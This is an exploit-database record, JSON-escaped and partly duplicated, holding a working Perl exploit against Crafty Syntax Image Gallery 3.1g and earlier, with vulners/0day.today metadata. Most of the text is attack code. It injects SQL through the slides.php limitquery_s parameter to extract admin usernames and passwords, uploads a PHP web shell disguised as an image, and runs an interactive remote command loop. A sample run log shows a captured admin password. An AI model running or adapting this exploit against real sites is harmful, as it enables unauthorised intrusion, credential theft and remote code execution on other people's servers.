$location;\r\n}\r\n\r\nsub get_projectid(\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\t\r\n\tmy $query = \"GET \".$path.\"imagemenu.php?html=menu.tpl HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tmy $projectid;\r\n\tif($data =~ /\\?projectid=([0-9]*)/)\r\n\t{\r\n\t\t$projectid = $1;\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprint \"[-] no projectid found\";\r\n\t\texit;\r\n\t}\r\n\r\n\tprint \"[+] projectid is '$projectid'\\n\";\r\n\treturn $projectid;\r\n}\r\n\r\nsub upload_shell(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\tmy $projectid = shift;\r\n\t\r\n\tmy $query = \"GET \".$path.\"newimage.php?projectid=\".$projectid.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /Access denied.../)\r\n\t{\r\n\t\tprint \"[-] no admin privileges (mysql < 4.0 ?)\\n\";\r\n\t\texit;\r\n\t}\r\n\r\n\tmy $shell = \"<? if(isset(\\$_POST['c'])) { system(\\$_POST['c']); } ?>\";\r\n\r\n\tmy $boundary = \"-----------------------------220162907215434\";\r\n\tmy $post = \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"projectid\\\"\\r\\n\\r\\n\";\r\n\t$post .= $projectid.\"\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"A_MONTH\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"03\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"A_DAY\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"26\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"A_YEAR\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"2006\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"fullimage\\\"; filename=\\\"my_image.jpg\\\"\\r\\n\";\r\n\t$post .= \"Content-Type: text/plain\\r\\n\\r\\n\";\r\n\t$post .= $shell.\"\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"description\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"another image\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"ext\\\"\\r\\n\\r\\n\";\r\n\t$post .= \".php\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"feature__\".$projectid.\"\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"Y\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"addnow\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"ADD\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"--\\r\\n\";\r\n\r\n\tmy $query = \"POST \".$path.\"newimage.php?projectid=\".$projectid.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: multipart/form-data; boundary=\".$boundary.\"\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"Content-Length: \".length($post).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $post;\r\n\r\n\tsendpacket($server, $port, $query);\r\n}\r\n\r\nsub login(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $username = shift;\r\n\tmy $password = shift;\r\n\r\n\tmy $d = \"whattodo=login&myusername=\".$username.\"&mypassword=\".$password;\r\n\tmy $query = \"POST \".$path.\"index.php HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"Content-Length: \".length($d).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $d;\r\n\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /<td><b>Your Name:<\\/td><td><input type=text name=myusername/ || $data !~ /Set-Cookie: /)\r\n\t{\r\n\t\tprint \"[-] failed to login\\n\";\r\n\t\texit;\r\n\t}\r\n\t\r\n\tmy $cookies = \"\";\t# chocolate cookies\r\n\tmy $index1 = index($data, \"\\r\\n\\r\\n\");\r\n\tif($index1 >= 0)\r\n\t{\r\n\t\tmy $index2 = index($data, \"Set-Cookie: \") + 12;\r\n\t\tmy $index3 = index($data, \"\\r\\n\", $index2);\r\n\t\t$cookies = \"Cookie: \".substr($data, $index2, $index3-$index2+2);\r\n\t}\r\n\t\r\n\tprint \"[+] logged in as '$username'\\n\";\r\n\treturn $cookies;\r\n}\r\n\r\nsub register(\\$, \\$, \\$, \\$, \\$, \\$, \\$) {\r\n\tmy $server = shift;\r\n\tmy $path = shift;\r\n\tmy $name = shift;\r\n\tmy $user = shift;\r\n\tmy $password = shift;\r\n\tmy $email = shift;\r\n\r\n\tmy $d = \"action=register&emailadd=\".$email.\"&newname=\".$name.\"&newusername=\".$user.\"&newpassword=\".$password;\r\n\tmy $query = \"POST \".$path.\"lostsheep.php HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"Content-Length: \".length($d).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $d;\r\n\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /<li>Sorry the username you entered <b><\\/b> is already taken.. try again/)\r\n\t{\r\n\t\tprint \"[-] failed: username taken\\n\";\r\n\t\texit;\r\n\t}\r\n\tif($data =~ /you did not enter in a/)\r\n\t{\r\n\t\tprint \"[-] failed\\n\";\r\n\t\texit;\r\n\t}\r\n\tprint \"[+] user '$user' with password '$password' registered\\n\";\r\n}\r\n\r\nsub sendpacket(\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $request = shift;\r\n\r\n\tmy $sock = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => $server, PeerPort => $port) or die \"[-] Could not connect to $server:$port $!\\n\";\r\n\tprint $sock \"$request\";\r\n\r\n\t\r\n\tmy $data = \"\";\r\n\tmy $answer;\r\n\twhile($answer = <$sock>)\r\n\t{\r\n\t\t$data .= $answer;\r\n\t}\r\n\t\r\n\tclose($sock);\r\n\treturn $data;\r\n}\r\n\r\nsub randstring(\\$,\\$) {\r\n\tmy $min = shift;\r\n\tmy $max = shift;\r\n\r\n\tmy $length = int( (rand(65535)%($max-$min+1))+$min);\r\n\tmy $ret = \"\";\r\n\tfor(my $i = 0; $i < $length; $i++)\r\n\t{\r\n\t\tmy $w = int(rand(3));\r\n\t\tif($w == 0)\r\n\t\t{\r\n\t\t\t$ret .= chr(97 + int(rand(26)));\r\n\t\t}\r\n\t\telsif($w == 1)\r\n\t\t{\r\n\t\t\t$ret .= chr(65 + int(rand(26)));\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t$ret .= chr(48 + int(rand(10)));\r\n\t\t}\r\n\t}\r\n\r\n\treturn $ret;\r\n}\r\n\r\n\r\nsub usage() {\r\n\tprintf \"usage: %s <website> <port> [user(optional)] [password(optional)] [shell path without trailing / (optional)]\\n\", $0;\r\n\tprintf \"exemple: %s www.site.com/csig/ 80\\n\", $0;\r\n\texit;\r\n}\r\n\r\n\r\nsub urlEncode {\r\n my ($string) = @_;\r\n $string =~ s/(\\W)/\"%\" . unpack(\"H2\", $1)/ge;\r\n return $string;\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "20c48ff4840edd32b8fe5dec084d0657", "key": "href"}, {"hash": "c909683139456c976936f60c867f1059", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "4fdc3fdec6d9aa927d99ca165e56d195", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "1676b5b518b556bc81ba80597c9985f6", "key": "reporter"}, {"hash": "4fdc3fdec6d9aa927d99ca165e56d195", "key": "published"}, {"hash": "ba34434bf90fbbae07910a1d1f8db77d", "key": "sourceHref"}, {"hash": "86c579deb7dc65088d549141741d1308", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "bc9041f4ee358a23ab8767bd553895d6a725b9f9c017181218ae019de4c63bee", "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-04-02T00:19:26", "edition": 2, "title": "Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit", "href": "https://0day.today/exploit/description/336", "modified": "2006-04-04T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/336", "references": [], "reporter": "undefined1_", "sourceData": "=================================================================\r\nCrafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit\r\n=================================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n###############################################################################\r\n# This program is free software; you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License\r\n# as published by the Free Software Foundation; either version 2\r\n# of the License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n###############################################################################\r\n\r\n# =====================================================\r\n# $ crappy_syntax.pl localhost/csig/ 80\r\n#\r\n# :: crafty syntax image gallery <= 3.1g\r\n# :: by undefined1_ @ bash-x.net/undef/\r\n# :: note: this works only on mysql >= 4.0\r\n#\r\n#\r\n# [+] creating user account\r\n# [+]\t\tuser: 98fe56123\r\n#\t\t\tpassword: 7652L4M3l39q\r\n#\t\t\temail: [email\u00a0protected]\r\n# [+] user '98fe56123' with password '7652L4M3l39q' registered\r\n# [+] logged in as 98fe56123\r\n# [+] projectid is 2\r\n# [-] no admin found for this projectid, trying the username 'admin'\r\n# [+] admin username: 'admin'\r\n# [+] admin password: '1111'\r\n# [+] logged in as 'admin'\r\n# [+] getting shell location\r\n# [+] shell @ 'userimages/1/18d76bcbc6f2.php'\r\n# [+] have phun?\r\n#\r\n# localhost$ uname\r\n# Linux\r\n# localhost$ whoami\r\n# nobody\r\n# =====================================================\r\n\r\nuse strict; \r\nuse IO::Socket;\r\n\r\n$| = 1;\r\nprint \":: crafty syntax image gallery <= 3.1g\\n\";\r\nprint \":: by undefined1_ @ bash-x.net/undef/\\n\";\r\nprint \":: note: this works only on mysql >= 4.0\\n\\n\\n\";\r\n\r\nmy $website = shift || usage();\r\nmy $port = shift || usage();\r\nmy $user = shift;\r\nmy $password = shift;\r\nmy $location = shift;\r\n\r\n\r\n\r\nmy $path = \"/\";\r\nmy $server = $website;\r\nif(index($website, \"/\") != -1)\r\n{\r\n\t$path = substr($website, index($website, \"/\"));\r\n\t$server = substr($website, 0, index($website, \"/\"));\r\n\tif(substr($path, length($path)-1) ne \"/\")\r\n\t{\r\n\t\t$path .= \"/\";\r\n\t}\r\n}\r\nif($location eq \"\")\r\n{\r\n\tif($user eq \"\" && $password eq \"\")\r\n\t{\r\n\t\tprint \"[+] creating user account\\n\";\r\n\t\t$user = randstring(8,12);\r\n\t\t$password = randstring(8,12);\r\n\t\tmy $email = randstring(8,12).\"\\@hotmail.com\";\r\n\t\tprintf(\"[+]\\tuser: %s\\n\", $user);\r\n\t\tprintf(\"\\tpassword: %s\\n\", $password);\r\n\t\tprintf(\"\\temail: %s\\n\", $email);\r\n\t\tregister($server, $path, $user, $user, $password, $email);\r\n\t}\r\n\r\n\tmy $cookies = login($server, $port, $path, $user, $password);\r\n\tmy $projectid = get_projectid($server, $port, $path, $cookies);\r\n\tmy @admin = send_payload($server, $port, $path, $cookies, $projectid);\r\n\r\n\t$cookies = login($server, $port, $path, $admin[0], $admin[1]);\r\n\tupload_shell($server, $port, $path, $cookies, $projectid);\r\n\t$location = get_shell_location($server,$port,$path,$cookies);\r\n}\r\n\r\ncheck_shell($server, $port, $path, $location);\r\nprintf(\"[+] have phun?\\n\\n\");\r\nmy $command;\r\nwhile(1) \r\n{\r\n\tprint $server.\"\\$ \";\r\n\twhile(<STDIN>) \r\n\t{\r\n\t\t$command = $_;\r\n\t\tchomp($command);\r\n\t\tlast;\r\n\t}\r\n\tdo_shell($server,$port,$path,$location,$command);\r\n}\r\n\r\n\r\nsub send_payload(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\tmy $projectid = shift;\r\n\tmy $shellcode;\r\n\r\n\t$shellcode = \"\\x61\\x6e\\x64\\x20\\x31\\x3d\\x30\\x20\\x75\\x6e\\x69\\x6f\\x6e\\x20\";\r\n\t$shellcode .= \"\\x61\\x6c\\x6c\\x20\\x73\\x65\\x6c\\x65\\x63\\x74\\x20\\x31\\x2c\\x32\";\r\n\t$shellcode .= \"\\x2c\\x33\\x2c\\x34\\x2c\\x35\\x2c\\x75\\x73\\x65\\x72\\x69\\x64\\x20\";\r\n\t$shellcode .= \"\\x61\\x73\\x20\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6f\\x6e\";\r\n\t$shellcode .= \"\\x2c\\x37\\x2c\\x38\\x2c\\x39\\x2c\\x30\\x2c\\x31\\x2c\\x32\\x2c\\x33\";\r\n\t$shellcode .= \"\\x2c\\x34\\x2c\\x35\\x2c\\x35\\x20\\x66\\x72\\x6f\\x6d\\x20\\x67\\x61\";\r\n\t$shellcode .= \"\\x6c\\x6c\\x65\\x72\\x79\\x5f\\x61\\x63\\x63\\x65\\x73\\x73\\x20\\x77\";\r\n\t$shellcode .= \"\\x68\\x65\\x72\\x65\\x20\\x67\\x61\\x6c\\x6c\\x65\\x72\\x79\\x69\\x64\";\r\n\t$shellcode .= \"\\x3d\";\r\n\t$shellcode .= $projectid;\r\n\t$shellcode .= \"\\x20\\x61\\x6e\\x64\\x20\\x70\\x65\\x72\\x6d\\x69\\x73\\x73\\x69\\x6f\";\r\n\t$shellcode .= \"\\x6e\\x73\\x3d\\x43\\x4f\\x4e\\x43\\x41\\x54\\x28\\x30\\x78\\x34\\x36\";\r\n\t$shellcode .= \"\\x35\\x35\\x34\\x63\\x34\\x63\\x29\\x20\\x2d\\x2d\";\r\n\r\n\tmy $query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data !~ /photo_captions\\[1\\] = \"/)\r\n\t{\r\n\t\tprint \"[-] no admin found for this projectid, trying the username 'admin'\\n\";\r\n\t\t$shellcode = \"and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where username=CONCAT(0x61646d696e) --\";\r\n\t\t$query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t\t$query .= \"Host: $server\\r\\n\";\r\n\t\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t\t$query .= \"Connection: close\\r\\n\";\r\n\t\t$query .= $cookies;\r\n\t\t$query .= \"\\r\\n\";\r\n\t\tmy $data = sendpacket($server, $port, $query);\r\n\t\tif($data !~ /photo_captions\\[1\\] = \"/ || $data !~ /photo_urls\\[1\\] = \"/)\r\n\t\t{\r\n\t\t\tprint \"[-] exploit failed\\n\";\r\n\t\t\texit;\r\n\t\t}\r\n\t\tmy $index1 = index($data, \"photo_captions[1] = \\\" \") + 22;\r\n\t\tmy $index2 = index($data, \"\\\"\", $index1);\r\n\t\tmy $passwd = substr($data, $index1, $index2-$index1);\r\n\r\n\t\t$index1 = index($data, \"photo_urls[1] = \\\"\") + 17;\r\n\t\t$index2 = index($data, \"\\\"\", $index1);\r\n\t\t$data = substr($data, $index1, $index2-$index1);\r\n\t\t$index1 = rindex($data, \"/\") + 1;\r\n\t\tmy $username = substr($data, $index1);\r\n\r\n\r\n\t\tprint \"[+] admin username: '$username'\\n\";\r\n\t\tprint \"[+] admin password: '$passwd'\\n\";\r\n\r\n\t\tmy @ret;\r\n\t\tpush(@ret, $username);\r\n\t\tpush(@ret, $passwd);\r\n\t\treturn @ret;\r\n\t}\r\n\tmy $index1 = index($data, \"photo_captions[1] = \\\" \") + 22;\r\n\tmy $index2 = index($data, \"\\\"\", $index1);\r\n\tmy $uid = substr($data, $index1, $index2-$index1);\r\n\tprint \"[+] admin uid: '$uid'\\n\";\r\n\r\n\r\n\r\n\r\n\r\n\t$shellcode = \"and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where recno=\".$uid.\" --\";\r\n\t$query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data !~ /photo_captions\\[1\\] = \"/ || $data !~ /photo_urls\\[1\\] = \"/)\r\n\t{\r\n\t\tprint \"[-] exploit failed (mysql < 4 ?)\\n\";\r\n\t\texit;\r\n\t}\r\n\t$index1 = index($data, \"photo_captions[1] = \\\" \") + 22;\r\n\t$index2 = index($data, \"\\\"\", $index1);\r\n\tmy $passwd = substr($data, $index1, $index2-$index1);\r\n\r\n\t$index1 = index($data, \"photo_urls[1] = \\\"\") + 17;\r\n\t$index2 = index($data, \"\\\"\", $index1);\r\n\t$data = substr($data, $index1, $index2-$index1);\r\n\t$index1 = rindex($data, \"/\") + 1;\r\n\tmy $username = substr($data, $index1);\r\n\r\n\r\n\tprint \"[+] admin username: '$username'\\n\";\r\n\tprint \"[+] admin password: '$passwd'\\n\";\r\n\r\n\tmy @ret;\r\n\tpush(@ret, $username);\r\n\tpush(@ret, $passwd);\r\n\treturn @ret;\r\n}\r\n\r\n\r\nsub do_shell(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $location = shift;\r\n\tmy $command = shift;\r\n\r\n\tmy $d = \"c=\".$command;\r\n\tmy $query = \"POST \".$path.$location.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"Content-Length: \".length($d).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $d;\r\n\t\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tmy $index = index($data, \"\\r\\n\\r\\n\");\r\n\tif($index >= 0)\r\n\t{\r\n\t\tprint substr($data, $index+4).\"\\n\";\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprint \"[-] shell error?\\n\";\r\n\t}\r\n}\r\n\r\nsub check_shell(\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $location = shift;\r\n\r\n\t\r\n\tmy $query = \"GET \".$path.$location.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\r\n\tif($data !~ /HTTP\\/1.1 200 OK/)\r\n\t{\r\n\t\tprint \"[-] shell not found\\n\";\r\n\t\tprint \"[-] try \".$server.$path.\"/userimages/\\n\";\r\n\t\texit;\r\n\t}\r\n}\r\n\r\nsub get_shell_location(\\$,\\$,\\$,\\$) {\t\r\n\tprint \"[+] getting shell location\\n\";\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\tmy $shellcode;\r\n\r\n\t$shellcode = \"\\x61\\x6e\\x64\\x20\\x69\\x6d\\x61\\x67\\x65\\x20\\x4c\\x49\\x4b\\x45\\x20\\x43\";\r\n\t$shellcode .= \"\\x4f\\x4e\\x43\\x41\\x54\\x28\\x30\\x78\\x32\\x35\\x32\\x65\\x37\\x30\\x36\\x38\";\r\n\t$shellcode .= \"\\x37\\x30\\x29\\x20\\x6f\\x72\\x64\\x65\\x72\\x20\\x62\\x79\\x20\\x72\\x65\\x63\";\r\n\t$shellcode .= \"\\x6e\\x6f\\x20\\x64\\x65\\x73\\x63\\x20\\x6c\\x69\\x6d\\x69\\x74\\x20\\x31\\x20\";\r\n\t$shellcode .= \"\\x2d\\x2d\";\r\n\r\n\t\r\n\tmy $query = \"GET \".$path.\"slides.php?limitquery_s=\".urlEncode($shellcode).\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /There are no photos in this gallery/)\r\n\t{\r\n\t\tprint \"[-] shell not found\\n\";\r\n\t\tprint \"[-] try \".$server.$path.\"/userimages/\\n\";\r\n\t\texit;\r\n\t}\r\n\r\n\tmy $index1 = index($data, \"photo_urls[1] = \\\"\") + 17;\r\n\tmy $index2 = index($data, \"\\\"\", $index1);\r\n\tmy $location = substr($data, $index1, $index2-$index1);\r\n\tprint \"[+] shell @ '\".$location.\"'\\n\";\r\n\treturn $location;\r\n}\r\n\r\nsub get_projectid(\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\t\r\n\tmy $query = \"GET \".$path.\"imagemenu.php?html=menu.tpl HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tmy $projectid;\r\n\tif($data =~ /\\?projectid=([0-9]*)/)\r\n\t{\r\n\t\t$projectid = $1;\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprint \"[-] no projectid found\";\r\n\t\texit;\r\n\t}\r\n\r\n\tprint \"[+] projectid is '$projectid'\\n\";\r\n\treturn $projectid;\r\n}\r\n\r\nsub upload_shell(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $cookies = shift;\r\n\tmy $projectid = shift;\r\n\t\r\n\tmy $query = \"GET \".$path.\"newimage.php?projectid=\".$projectid.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"\\r\\n\";\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data =~ /Access denied.../)\r\n\t{\r\n\t\tprint \"[-] no admin privileges (mysql < 4.0 ?)\\n\";\r\n\t\texit;\r\n\t}\r\n\r\n\tmy $shell = \"<? if(isset(\\$_POST['c'])) { system(\\$_POST['c']); } ?>\";\r\n\r\n\tmy $boundary = \"-----------------------------220162907215434\";\r\n\tmy $post = \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"projectid\\\"\\r\\n\\r\\n\";\r\n\t$post .= $projectid.\"\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"A_MONTH\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"03\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"A_DAY\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"26\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"A_YEAR\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"2006\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"fullimage\\\"; filename=\\\"my_image.jpg\\\"\\r\\n\";\r\n\t$post .= \"Content-Type: text/plain\\r\\n\\r\\n\";\r\n\t$post .= $shell.\"\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"description\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"another image\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"ext\\\"\\r\\n\\r\\n\";\r\n\t$post .= \".php\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"feature__\".$projectid.\"\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"Y\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"\\r\\n\";\r\n\t$post .= \"Content-Disposition: form-data; name=\\\"addnow\\\"\\r\\n\\r\\n\";\r\n\t$post .= \"ADD\\r\\n\";\r\n\r\n\t$post .= \"--\".$boundary.\"--\\r\\n\";\r\n\r\n\tmy $query = \"POST \".$path.\"newimage.php?projectid=\".$projectid.\" HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: multipart/form-data; boundary=\".$boundary.\"\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= $cookies;\r\n\t$query .= \"Content-Length: \".length($post).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $post;\r\n\r\n\tsendpacket($server, $port, $query);\r\n}\r\n\r\nsub login(\\$,\\$,\\$,\\$,\\$) {\r\n\tmy $server = shift;\r\n\tmy $port = shift;\r\n\tmy $path = shift;\r\n\tmy $username = shift;\r\n\tmy $password = shift;\r\n\r\n\tmy $d = \"whattodo=login&myusername=\".$username.\"&mypassword=\".$password;\r\n\tmy $query = \"POST \".$path.\"index.php HTTP/1.1\\r\\n\";\r\n\t$query .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t$query .= \"Host: $server\\r\\n\";\r\n\t$query .= \"User-Agent: Mozilla/5.0\\r\\n\";\r\n\t$query .= \"Connection: close\\r\\n\";\r\n\t$query .= \"Content-Length: \".length($d).\"\\r\\n\";\r\n\t$query .= \"\\r\\n\";\r\n\t$query .= $d;\r\n\r\n\tmy $data = sendpacket($server, $port, $query);\r\n\tif($data 